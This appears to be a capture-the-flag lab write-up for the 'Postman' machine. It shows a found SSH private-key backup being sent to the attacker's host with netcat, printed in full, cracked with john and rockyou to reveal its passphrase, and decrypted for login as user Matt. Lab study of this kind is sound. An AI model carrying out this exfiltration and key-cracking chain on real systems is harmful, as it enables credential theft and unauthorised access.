InfoSec LAB

Postman_SSH_Backup

Created: 2 min read

SSH Backup

redis@postman:/opt$ ll
total 12K
4.0K drwxr-xr-x 22 root root 4.0K Sep 30  2020 ..
4.0K drwxr-xr-x  2 root root 4.0K Sep 11  2019 .
4.0K -rwxr-xr-x  1 Matt Matt 1.8K Aug 26  2019 id_rsa.bak

After performing some basic enumeration, I came across what appears to be a SSH backup file, which was also detected by PEAS Judging by the ownership, it belongs to the Matt user

redis@postman:/opt$ nc 10.10.16.8 2222 < ./id_rsa.bak
 
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ nnc 2222 > id_rsa.bak          
listening on [any] 2222 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.160] 56556

Transferring the backup file to Kali for further inspection

id_rsa.bak

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ file id_rsa.bak  
id_rsa.bak: PEM RSA private key
 
┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ cat id_rsa.bak                                        
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
 
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

Looking into the file content reveals that it’s an encrypted RSA private key in PEM (Privacy-Enhanced Mail) format While it’s likely an SSH-RSA key, judging by the filename, it is also very much likely password-protected as it shows ENCRYPTED

However, it can easily be converted into a crack-able hashstring

Password Cracking

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ ssh2john ./id_rsa.bak > id_rsa.bak.hash

converting the encrypted RSA key into a crack-able hashstring; id_rsa.bak.hash

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ john ./id_rsa.bak.hash --wordlist=/usr/share/wordlists/rockyou.txt   
using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (./id_rsa.bak)     
1g 0:00:00:00 DONE (2023-10-05 13:36) 8.333g/s 2056Kp/s 2056Kc/s 2056KC/s container..comic
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Hashstring cracked The passphrase for the encrypted RSA key is computer2008

Decryption

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ openssl rsa -in id_rsa.bak -out id_rsa                
Enter pass phrase for id_rsa.bak: computer2008
writing RSA key

Decrypting the encrypted RSA key with the cracked passphrase

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ chmod 600 ./id_rsa

Changing the permission bits of the decrypted SSH key into a useable format

┌──(kali㉿kali)-[~/…/htb/labs/postman/ssh_backup]
└─$ ll id_rsa                           
4.0K -rw------- 1 kali kali 1.7K Oct  5 13:41 id_rsa

Supposedly, this could now be used to authenticate to the target system as the Matt user via SSH

Interactive Graph View

Backlinks